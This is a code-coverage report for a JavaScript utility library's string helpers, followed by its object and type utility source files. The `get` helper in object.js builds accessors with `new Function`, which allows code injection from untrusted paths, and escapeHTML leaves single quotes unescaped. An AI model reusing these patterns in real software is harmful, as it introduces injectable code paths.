<a name='L190'></a><a href='#L190'>190</a>
<a name='L191'></a><a href='#L191'>191</a>
<a name='L192'></a><a href='#L192'>192</a>
<a name='L193'></a><a href='#L193'>193</a>
<a name='L194'></a><a href='#L194'>194</a>
<a name='L195'></a><a href='#L195'>195</a>
<a name='L196'></a><a href='#L196'>196</a>
<a name='L197'></a><a href='#L197'>197</a>
<a name='L198'></a><a href='#L198'>198</a>
<a name='L199'></a><a href='#L199'>199</a>
<a name='L200'></a><a href='#L200'>200</a>
<a name='L201'></a><a href='#L201'>201</a>
<a name='L202'></a><a href='#L202'>202</a>
<a name='L203'></a><a href='#L203'>203</a>
<a name='L204'></a><a href='#L204'>204</a>
<a name='L205'></a><a href='#L205'>205</a>
<a name='L206'></a><a href='#L206'>206</a>
<a name='L207'></a><a href='#L207'>207</a>
<a name='L208'></a><a href='#L208'>208</a>
<a name='L209'></a><a href='#L209'>209</a>
<a name='L210'></a><a href='#L210'>210</a>
<a name='L211'></a><a href='#L211'>211</a>
<a name='L212'></a><a href='#L212'>212</a>
<a name='L213'></a><a href='#L213'>213</a>
<a name='L214'></a><a href='#L214'>214</a>
<a name='L215'></a><a href='#L215'>215</a>
<a name='L216'></a><a href='#L216'>216</a>
<a name='L217'></a><a href='#L217'>217</a>
<a name='L218'></a><a href='#L218'>218</a>
<a name='L219'></a><a href='#L219'>219</a>
<a name='L220'></a><a href='#L220'>220</a>
<a name='L221'></a><a href='#L221'>221</a>
<a name='L222'></a><a href='#L222'>222</a>
<a name='L223'></a><a href='#L223'>223</a>
<a name='L224'></a><a href='#L224'>224</a>
<a name='L225'></a><a href='#L225'>225</a>
<a name='L226'></a><a href='#L226'>226</a>
<a name='L227'></a><a href='#L227'>227</a>
<a name='L228'></a><a href='#L228'>228</a>
<a name='L229'></a><a href='#L229'>229</a>
<a name='L230'></a><a href='#L230'>230</a>
<a name='L231'></a><a href='#L231'>231</a>
<a name='L232'></a><a href='#L232'>232</a>
<a name='L233'></a><a href='#L233'>233</a>
<a name='L234'></a><a href='#L234'>234</a>
<a name='L235'></a><a href='#L235'>235</a>
<a name='L236'></a><a href='#L236'>236</a>
<a name='L237'></a><a href='#L237'>237</a>
<a name='L238'></a><a href='#L238'>238</a>
<a name='L239'></a><a href='#L239'>239</a>
<a name='L240'></a><a href='#L240'>240</a>
<a name='L241'></a><a href='#L241'>241</a>
<a name='L242'></a><a href='#L242'>242</a>
<a name='L243'></a><a href='#L243'>243</a>
<a name='L244'></a><a href='#L244'>244</a>
<a name='L245'></a><a href='#L245'>245</a>
<a name='L246'></a><a href='#L246'>246</a>
<a name='L247'></a><a href='#L247'>247</a>
<a name='L248'></a><a href='#L248'>248</a>
<a name='L249'></a><a href='#L249'>249</a>
<a name='L250'></a><a href='#L250'>250</a>
<a name='L251'></a><a href='#L251'>251</a>
<a name='L252'></a><a href='#L252'>252</a>
<a name='L253'></a><a href='#L253'>253</a>
<a name='L254'></a><a href='#L254'>254</a>
<a name='L255'></a><a href='#L255'>255</a>
<a name='L256'></a><a href='#L256'>256</a>
<a name='L257'></a><a href='#L257'>257</a>
<a name='L258'></a><a href='#L258'>258</a>
<a name='L259'></a><a href='#L259'>259</a>
<a name='L260'></a><a href='#L260'>260</a>
<a name='L261'></a><a href='#L261'>261</a>
<a name='L262'></a><a href='#L262'>262</a>
<a name='L263'></a><a href='#L263'>263</a>
<a name='L264'></a><a href='#L264'>264</a>
<a name='L265'></a><a href='#L265'>265</a>
<a name='L266'></a><a href='#L266'>266</a>
<a name='L267'></a><a href='#L267'>267</a>
<a name='L268'></a><a href='#L268'>268</a>
<a name='L269'></a><a href='#L269'>269</a>
<a name='L270'></a><a href='#L270'>270</a>
<a name='L271'></a><a href='#L271'>271</a>
<a name='L272'></a><a href='#L272'>272</a>
<a name='L273'></a><a href='#L273'>273</a>
<a name='L274'></a><a href='#L274'>274</a>
<a name='L275'></a><a href='#L275'>275</a>
<a name='L276'></a><a href='#L276'>276</a>
<a name='L277'></a><a href='#L277'>277</a>
<a name='L278'></a><a href='#L278'>278</a>
<a name='L279'></a><a href='#L279'>279</a>
<a name='L280'></a><a href='#L280'>280</a>
<a name='L281'></a><a href='#L281'>281</a>
<a name='L282'></a><a href='#L282'>282</a>
<a name='L283'></a><a href='#L283'>283</a>
<a name='L284'></a><a href='#L284'>284</a>
<a name='L285'></a><a href='#L285'>285</a>
<a name='L286'></a><a href='#L286'>286</a>
<a name='L287'></a><a href='#L287'>287</a>
<a name='L288'></a><a href='#L288'>288</a>
<a name='L289'></a><a href='#L289'>289</a>
<a name='L290'></a><a href='#L290'>290</a>
<a name='L291'></a><a href='#L291'>291</a>
<a name='L292'></a><a href='#L292'>292</a>
<a name='L293'></a><a href='#L293'>293</a></td><td class="line-coverage quiet"><span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-yes">7x</span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-yes">7x</span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-yes">7x</span>
<span class="cline-any cline-yes">2x</span>
<span class="cline-any cline-yes">3x</span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-yes">7x</span>
<span class="cline-any cline-yes">2x</span>
<span class="cline-any cline-yes">2x</span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-yes">7x</span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-yes">7x</span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-yes">7x</span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-yes">7x</span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-yes">7x</span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-yes">7x</span>
<span class="cline-any cline-yes">63x</span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-yes">7x</span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-yes">7x</span>
<span class="cline-any cline-yes">2x</span>
<span class="cline-any cline-yes">6x</span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-yes">2x</span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-yes">7x</span>
<span class="cline-any cline-yes">2x</span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-yes">6x</span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-yes">7x</span>
<span class="cline-any cline-yes">3x</span>
<span class="cline-any cline-yes">3x</span>
<span class="cline-any cline-yes">6x</span>
<span class="cline-any cline-yes">3x</span>
<span class="cline-any cline-yes">9x</span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-yes">3x</span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-yes">7x</span>
<span class="cline-any cline-yes">2x</span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-yes">6x</span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-yes">7x</span>
<span class="cline-any cline-yes">1x</span>
<span class="cline-any cline-yes">2x</span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-yes">2x</span>
<span class="cline-any cline-yes">2x</span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-yes">7x</span>
<span class="cline-any cline-yes">3x</span>
<span class="cline-any cline-yes">3x</span>
<span class="cline-any cline-yes">13x</span>
<span class="cline-any cline-yes">13x</span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-yes">3x</span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-yes">7x</span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-neutral"> </span>
<span class="cline-any cline-yes">7x</span>
<span class="cline-any cline-neutral"> </span></td><td class="text"><pre class="prettyprint lang-js">/** @module String */
import { isUndefined } from './type'
import { random } from './number'
/**
* 获取字符串的字节长度
* @function byteSize
* @param {string} str - 字符串
* @return {number}
* @example
* U.byteSize('日')
* // => 3
*
* U.byteSize('12')
* // => 2
*
* U.byteSize('hello')
* // => 5
*/
export const byteSize = str => new Blob([str]).size
/**
* 反转字符串
* @function reverseString
* @param {string} str - 字符串
* @return {str}
* @example
* U.reverseString('hello!')
* // => '!olleh'
*/
export const reverseString = str => [...str].reverse().join('')
/**
* 向URL追加参数
* @function stringifyURL
* @param {string} url - URL路径
* @param {object} params - 参数对象
* @return {string}
* @example
* U.stringifyURL('https://www.google.com/', {name: 'john', age: 30})
* // => 'https://www.google.com/?name=john&age=30'
*/
export const stringifyURL = (url, params) => {
url += (/\?/).test(url) ? '&' : '?'
return url += Object.keys(params).map(key => `${key}=${params[key]}`).join('&')
}
/**
* 解析URL参数
* @function parseURL
* @param {string} url - 字符串
* @return {object}
* @example
* U.parseURL('http://url.com/page?name=Adam&surname=Smith')
* // => {name: 'Adam', surname: 'Smith'}
*
* U.parseURL('https://www.google.com/')
* // => {}
*/
export const parseURL = url => {
const arr = url.match(/([^?=&]+)(=([^&]*))/g) || []
return arr.reduce((a, v) => ((a[v.slice(0, v.indexOf('='))] = v.slice(v.indexOf('=') + 1)), a), {})
}
/**
* 移除字符串中的HTML标签
* @function removeHTML
* @param {string} str - 字符串
* @return {string}
* @example
* const str = '<p>这是<em>一个</em>段落。</p>'
* U.removeHTML(str)
* // => '这是一个段落。'
*/
export const removeHTML = str => str.replace(/<[^>]*>/g, '')
/**
* 转义特殊字符
* @function escapeHTML
* @param {string} str - 字符串
* @return {string}
* @example
* const str = '<a href="#">you & me</a>'
* U.escapeHTML(str)
* // => '&lt;a href=&quot;#&quot;&gt;you &amp; me&lt;/a&gt;'
*/
export const escapeHTML = str => str.replace(
/[&<>"]/g,
tag => ({
'&': '&amp;',
'<': '&lt;',
'>': '&gt;',
'"': '&quot;'
}[tag] || <span class="branch-1 cbranch-no" title="branch not covered" >tag)</span>
)
/**
* 反转义特殊字符
* @function unescapeHTML
* @param {string} str - 字符串
* @return {string}
* @example
* const str = '&lt;a href=&quot;#&quot;&gt;you &amp; me&lt;/a&gt;'
* U.unescapeHTML(str)
* // => '<a href="#">you & me</a>'
*/
export const unescapeHTML = str => str.replace(
/&amp;|&lt;|&gt;|&quot;/g,
tag => ({
'&amp;': '&',
'&lt;': '<',
'&gt;': '>',
'&quot;': '"'
}[tag] || <span class="branch-1 cbranch-no" title="branch not covered" >tag)</span>
)
/**
* 使用指定的掩码字符替换start~end之间的所有字符
* @function mask
* @param {string|number} str - 字符串
* @param {number} [start=0] - 可选,开始位置,默认为0(即字符串开头)
* @param {number} [end=0] - 可选,结束位置,默认为0(即字符串结尾)
* @param {string} [mask='*'] - 可选,掩码字符,默认为'*'号
* @return {string}
* @example
* U.mask(123456789) // => *********
* U.mask(123456789, 3) // => 123******
* U.mask(str, 0, 4) // => *****6789
* U.mask(str, 3, 4) // => 123**6789
* U.mask(str, 3, 4, '&') // => 123&&6789
*/
export const mask = (str, start = 0, end = 0, mask = '*') => [...`${str}`].map(
(v, i) => i >= start && i < `${str}`.length - end ? mask : v
).join('')
/**
* 随机生成16进制色值
* @function randomHex
* @return {string}
* @example
* U.randomHex()
* // => "#f13ba7"
*/
export const randomHex = <span class="fstat-no" title="function not covered" >()</span> => <span class="cstat-no" title="statement not covered" >'#' + (Math.random() * 0xfffff * 1000000).toString(16).slice(0, 6)</span>
/**
* 随机生成rgba色值
* @function randomRgba
* @param {number} [min=0] - 可选,最小色阶
* @param {number} [max=256] - 可选,最大色阶
* @param {number} [alpha=1] - 可选,透明度
* @return {string}
* @example
* U.randomRgba()
* // => rgba(223,135,252,1)
*
* U.randomRgba(154, 211, 0.5)
* // => rgba(191,178,179,0.5)
*/
export const randomRgba = (min = 0, max = 256, alpha = 1) => {
const color = Array.from({ length: 3 })
.reduce(acc => [...acc, Math.floor(random(min, max))], [])
.concat(alpha ? [alpha] : <span class="branch-1 cbranch-no" title="branch not covered" >[0])</span>
.join(',')
return `rgba(${color})`
}
/**
* 将3位16进制色值转为6位
* @function extendHex
* @param {string} shortHex - 字符串
* @return {string}
* @example
* U.extendHex('#03f')
* // => '#0033ff'
*
* U.extendHex('05a')
* // => '#0055aa'
*/
export const extendHex = shortHex => {
return '#' + shortHex.slice(shortHex.startsWith('#') ? 1 : 0)
.split('')
.map(x => x + x)
.join('')
}
/**
* 将16进制hex色值转为rgb(或rgba)色值
* @function hexToRGB
* @param {string} hex - 字符串,16进制hex色值
* @param {number} alpha - 可选,色彩透明度
* @return {string}
* @example
* U.hexToRGB('#e5f')
* // => rgb(238,85,255)
*
* U.hexToRGB('e5f')
* // => rgb(238,85,255)
*
* U.hexToRGB('#e5f', 0.5)
* // => rgba(238,85,255,0.5)
*/
export const hexToRGB = (hex, alpha) => {
const hasAlpha = !isUndefined(alpha)
let result = hex.slice(hex.startsWith('#') ? 1 : 0)
if (result.length === 3) result = [...result].map(s => s + s).join('')
result = result.match(/[0-9a-f]{2}/gi)
.map(s => parseInt(s, 16))
.concat(hasAlpha ? [alpha] : [])
.join(',')
return `rgb${hasAlpha ? 'a' : ''}(${result})`
}
/**
* 将rgb(或rgba)色值转为16进制hex色值
* @function RGBToHex
* @param {string} rgb - 字符串,rgb(或rgba)色值
* @return {string}
* @example
* U.RGBToHex('rgb(238,85,255)')
* // => #ee55ff
*
* U.RGBToHex('rgba(238,85,255,0.5)')
* // => #ee55ff
*/
export const RGBToHex = rgb => {
return '#' + rgb.match(/\d{1,3}/g)
.slice(0, 3)
.map(s => Number(s).toString(16).padStart(2, '0'))
.join('')
}
/**
* 解析cookie字符串
* @function parseCookie
* @param {string} str - 字符串
* @return {object}
* @example
* U.parseCookie('taken=bar; equation=E%3Dmc%5E2')
* // => {taken: 'bar', equation: 'E=mc^2'}
*/
export const parseCookie = str => {
return str.split(';')
.map(v => v.split('='))
.reduce((acc, v) => {
acc[decodeURIComponent(v[0].trim())] = decodeURIComponent(v[1].trim())
return acc
}, {})
}
/**
* 字符串转日期对象
* @function stringToDate
* @param {string} str - 字符串
* @return {date}
* @example
* U.stringToDate('2019/5-06').toString()
* // => Mon May 06 2019 00:00:00 GMT+0800 (中国标准时间)
*
* U.stringToDate('2019-5-06 20:21:22:500').toString()
* // => Mon May 06 2019 20:21:22 GMT+0800 (中国标准时间)
*/
export const stringToDate = str => {
const defs = [0, 1, 1, 0, 0, 0]
const args = str.split(/[^0-9]+/).map((v, i) => {
const val = Number(v) || defs[i]
return i === 1 ? (val - 1) : val
})
return new Date(...args)
}
/**
* 驼峰字符串转横线连接字符串
* @function camelToDash
* @param {string} str - 驼峰字符串
* @return {string}
* @example
* U.camelToDash('camelCase')
* => 'camel-case'
*/
export const camelToDash = str => str.replace(/([A-Z])/g,"-$1").toLowerCase()
/**
* 横线连接字符串转驼峰字符串
* @function dashToCamel
* @param {string} str - 横线连接字符串
* @return {string}
* @example
 * U.dashToCamel('dash-case')
* => 'dashCase'
*/
export const dashToCamel = str => str.replace(/\-(\w)/g, (a, l) => l.toUpperCase())
</pre></td></tr>
</table></pre>
<div class='push'></div><!-- for sticky footer -->
</div><!-- /wrapper -->
<div class='footer quiet pad2 space-top1 center small'>
Code coverage
generated by <a href="https://istanbul.js.org/" target="_blank">istanbul</a> at Thu Mar 12 2020 22:25:25 GMT+0800 (GMT+08:00)
</div>
</div>
<script src="prettify.js"></script>
<script>
window.onload = function () {
if (typeof prettyPrint === 'function') {
prettyPrint();
}
};
</script>
<script src="sorter.js"></script>
<script src="block-navigation.js"></script>
</body>
</html>
<|start_filename|>src/object.js<|end_filename|>
/** @module Object */
import { isObject } from './type'
/**
 * Deep clone an object.
 * @function deepClone
 * @param {object} obj - source object to deep clone
* @return {object}
* @example
* var a = { foo: 'bar', obj: { a: 1, b: 2 } }
* var b = U.deepClone(a)
* b.foo = 'foo'
* // => a = { foo: 'bar', obj: { a: 1, b: 2 } }, b = { foo: 'foo', obj: { a: 1, b: 2 } }
*/
export const deepClone = obj => {
let clone = Object.assign({}, obj)
Object.keys(clone).forEach(k => {
clone[k] = isObject(obj[k]) ? deepClone(obj[k]) : obj[k]
})
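  // Note: Object.assign only copies enumerable own properties, so class instances
  // nested inside obj (e.g. Date, Map, functions) are recursed into and come back
  // as plain objects rather than faithful copies.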
return Array.isArray(obj) ? (clone.length = obj.length) && Array.from(clone) : clone
}
/**
 * Recursively freezes an object.
 * @function deepFreeze
 * @param {object} obj - the object to deep-freeze
* @return {object}
* @example
* let arr = [1, [2, 3]]
* const o = U.deepFreeze(arr)
* o[0] = 3
* o[1][0] = 4
* // => arr = [1, [2, 3]], o = [1, [2, 3]]
*/
export const deepFreeze = obj => {
Object.keys(obj).forEach(prop => {
if (obj[prop] instanceof Object && obj[prop] !== null) {
deepFreeze(obj[prop])
}
})
return Object.freeze(obj)
}
/**
 * Renames keys of an object.
 * @function renameKeys
 * @param {object} map - an object of oldKey: newKey pairs
 * @param {object} obj - the target object
* @return {object}
* @example
* let obj = {name: 'john', job: 'fonts', detail: [1, 2]}
* U.renameKeys({job: 'possion'}, obj)
* // => { name: 'john', possion: 'fonts', detail: [ 1, 2 ] }
*/
export const renameKeys = (map, obj) => (
Object.keys(obj)
.reduce((acc, key) => ({
...acc,
...{ [map[key] || key]: obj[key] }
}), {})
)
/**
 * Omits the key-value pairs corresponding to the given keys from an object.
 * @function omit
 * @param {object} obj - the target object
 * @param {array} arr - an array of key names to omit
* @return {object}
* @example
* U.omit({ a: 1, b: '2', c: 3 }, ['b'])
* // => { a: 1, c: 3 }
*/
export const omit = (obj, arr) => (
Object.keys(obj)
.filter(k => !arr.includes(k))
.reduce((acc, key) => ((acc[key] = obj[key]), acc), {})
)
/**
 * Checks whether val is empty.
 * @function isEmpty
 * @param {*} val - the value to check
* @return {boolean}
* @example
* U.isEmpty(new Map()) // => true
* U.isEmpty(new Set()) // => true
* U.isEmpty({}) // => true
* U.isEmpty([]) // => true
* U.isEmpty('') // => true
* U.isEmpty({a: 1}) // => false
* U.isEmpty([2]) // => false
* U.isEmpty('text') // => false
* U.isEmpty(123) // => true
* U.isEmpty(true) // => true
* U.isEmpty(false) // => true
*/
export const isEmpty = val => !(Object.keys(val) || val).length
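// Note on isEmpty: Object.keys always returns an array, so the `|| val` fallback
// never takes effect, and passing null or undefined throws a TypeError.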
/**
 * Gets the value at the given path of an object.
 * @function get
 * @param {object} obj - the object to query
 * @param {string} path - the path of the property to get
* @return {*}
* @example
* const obj = {name: 'joe', child: [{name: 'john', child: null}]}
* U.get(obj, 'child[0].name')
* // => 'john'
*/
export const get = (obj, path) => new Function('obj', 'return obj.' + path)(obj)
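// Note on get: building the accessor with new Function is essentially eval, so a
// malformed or untrusted path string will throw (or execute arbitrary code).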
<|start_filename|>src/type.js<|end_filename|>
/** @module Type */
/**
 * Returns the type of val as a lowercase string.
 * @function getType
 * @param {*} val - the value to check.
* @return {string}
* @example
* U.getType(new Set([1, 2]))
* // => 'set'
*/
export const getType = val => (
isUndefined(val) ? 'undefined' : isNull(val) ? 'null' : val.constructor.name.toLowerCase()
)
/**
 * Checks whether value is of type number, using typeof; returns a boolean.
 * @function isNumber
 * @param {*} value - the value to check.
* @return {boolean}
* @example
* U.isNumber(3)
* // => true
*
* U.isNumber(Number.MIN_VALUE)
* // => true
*
* U.isNumber(Infinity)
* // => true
*
* U.isNumber('3')
* // => false
*/
export const isNumber = value => typeof value === 'number'
/**
 * Checks whether value is a string, using typeof; returns a boolean.
 * @function isString
 * @param {*} value - the value to check.
* @return {boolean}
* @example
* U.isString(3)
* // => false
*
* U.isString('3')
* // => true
*/
export const isString = value => typeof value === 'string'
/**
 * Checks whether value is null, using strict equality; returns a boolean.
 * @function isNull
 * @param {*} value - the value to check.
* @return {boolean}
* @example
* U.isNull(3)
* // => false
*
* U.isNull(null)
* // => true
*/
export const isNull = value => value === null
/**
 * Checks whether value is undefined, using strict equality; returns a boolean.
 * @function isUndefined
 * @param {*} value - the value to check.
* @return {boolean}
* @example
* U.isUndefined(undefined)
* // => true
*
* U.isUndefined(null)
* // => false
*/
export const isUndefined = value => value === undefined
/**
 * Checks whether value is a boolean, using typeof; returns a boolean.
 * @function isBoolean
 * @param {*} value - the value to check.
* @return {boolean}
* @example
* U.isBoolean(false)
* // => true
*
* U.isBoolean(null)
* // => false
*/
export const isBoolean = value => typeof value === 'boolean'
/**
 * Checks whether value is a symbol, using typeof; returns a boolean.
 * @function isSymbol
 * @param {*} value - the value to check.
* @return {boolean}
* @example
* U.isSymbol(Symbol('x'))
* // => true
*/
export const isSymbol = value => typeof value === 'symbol'
/**
 * Checks whether value is a function, using typeof; returns a boolean.
 * @function isFunction
 * @param {*} value - the value to check.
* @return {boolean}
* @example
* U.isFunction(3)
* // => false
*
* U.isFunction(function () {})
* // => true
*/
export const isFunction = value => typeof value === 'function'
/**
 * Checks whether arr is an array, using Array.isArray; returns a boolean.
 * @function isArray
 * @param {*} arr - the value to check.
* @return {boolean}
* @example
* U.isArray([])
* // => true
*
* U.isArray(null)
* // => false
*/
export const isArray = arr => Array.isArray(arr)
/**
 * Checks whether value is a non-array object; returns a boolean.
 * @function isObject
 * @param {*} value - the value to check.
* @return {boolean}
* @example
